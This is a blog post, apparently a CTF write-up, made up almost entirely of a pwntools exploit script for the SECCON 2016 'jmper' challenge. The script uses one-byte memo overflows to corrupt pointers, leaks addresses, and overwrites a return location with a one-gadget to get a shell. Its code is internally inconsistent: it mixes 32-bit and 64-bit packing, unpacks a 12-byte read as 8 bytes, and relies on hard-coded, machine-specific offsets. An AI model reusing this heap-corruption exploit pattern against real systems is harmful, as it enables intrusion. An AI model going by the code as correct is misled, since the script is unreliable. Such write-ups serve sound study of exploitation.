
cdor1's lab

Security/Pwnable

SECCON CTF 2016 jmper

Cdor1 2016. 12. 28. 03:25

Afterword: I suffered like hell because of the offsets... The challenge was original and good, but this dumb computer nerd's sanity gave out.

from pwn import *

s = remote('localhost', 4000)
elf = ELF('/home/parallels/pwnable/jmper')
libc = ELF('/home/parallels/pwnable/cdor1_libc')  # loaded but not otherwise used below

exit_got = elf.got['exit']  # address of exit's GOT entry in the binary

# Menu wrappers: 1 = add, 2 = set name, 3 = set memo, 4 = show name, 5 = show memo
def add():
    s.recvuntil(b':)')
    s.sendline(b'1')

def name(idx, data):
    s.recvuntil(b':)')
    s.sendline(b'2')
    s.recvuntil(b'ID:')
    s.sendline(str(idx).encode())
    s.recvuntil(b'Input name:')
    s.sendline(data)

def memo(idx, data):
    s.recvuntil(b':)')
    s.sendline(b'3')
    s.recvuntil(b'ID:')
    s.sendline(str(idx).encode())
    s.recvuntil(b'Input memo:')
    s.sendline(data)

def show_name(idx):
    s.recvuntil(b':)')
    s.sendline(b'4')
    s.recvuntil(b'ID:')
    s.sendline(str(idx).encode())

def show_memo(idx):
    s.recvuntil(b':)')
    s.sendline(b'5')
    s.recvuntil(b'ID:')
    s.sendline(str(idx).encode())

print('[*] start exploit!')

# Entry 0: fill the 32-byte memo and print it; the 4 bytes printed right after it are the leak
add()
memo(0, b'a' * 32)
show_memo(0)
s.recvuntil(b'a' * 32)
leak = u32(s.recv(4))
print('[*] leaked : ' + hex(leak))

# Entry 1: write 33 bytes into the memo (one byte past it), set the name to leak - 0xF8,
# then read what is printed back as a 6-byte pointer padded to 8 bytes
add()
memo(1, b'a' * 32 + b'\x78')
name(1, p32(leak - 0xF8))
show_name(1)
esp = u64(s.recv(12).ljust(8, b'\x00'))
print('[*] esp : ' + hex(esp))

# Entry 2: same one-byte overwrite, create entry 3, set entry 2's name to exit's GOT address
# and print entry 3's name to obtain exit's resolved address
add()
memo(2, b'a' * 32 + b'\x58')
add()
name(2, p32(exit_got))
show_name(3)
exit_leak = u64(s.recv(12).ljust(8, b'\x00'))
oneshot = exit_leak + 0xA248  # distance from exit to the one-gadget, hard-coded for the author's libc
print('[*] exit : ' + hex(exit_leak))
print('[*] oneshot : ' + hex(oneshot))

# Entry 4: overwrite again, set its name to esp - 0xd8, create entry 5,
# then write the one-gadget address through entry 4's name
add()
memo(4, b'd' * 32 + b'\xc8')
name(4, p64(esp - 0xd8))
add()
name(4, p64(oneshot))

# Keep adding entries, then hand the connection over to the user
for i in range(25):
    add()

s.interactive()
